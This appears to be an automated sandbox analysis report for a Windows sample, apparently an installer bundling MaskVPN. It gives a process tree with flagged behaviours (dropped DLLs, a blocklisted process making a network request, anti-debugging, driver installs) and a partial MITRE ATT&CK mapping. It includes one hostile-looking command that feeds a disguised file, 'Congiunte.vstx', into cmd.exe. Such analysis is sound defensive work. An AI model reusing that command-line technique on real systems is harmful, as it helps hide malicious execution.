"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Congiunte.vstx
4⤵
PID:3532

C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe
5⤵
PID:3604

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4872

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:5096

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2236

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A336B1C2DE39BA37444D58EE03674830 C
2⤵
- Loads dropped DLL
PID:4128

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 2699A3A6E38C153A33835621BCEDDFBA
2⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
PID:3784

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5968

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1192

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5804

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:2136

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6244

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:5052

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:6276

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7392

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:6760

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{485b83c2-a2f4-1e41-8453-b07803e69d6e}\oemvista.inf" "9" "4d14a44ff" "0000000000000180" "WinSta0\Default" "0000000000000184" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:5476

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000180"
2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:3780

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:7316

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
- Checks SCSI registry key(s)
PID:7336

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:3820

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:6324

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Query Registry

System Information Discovery

Security Software Discovery

T1063

Peripheral Device Discovery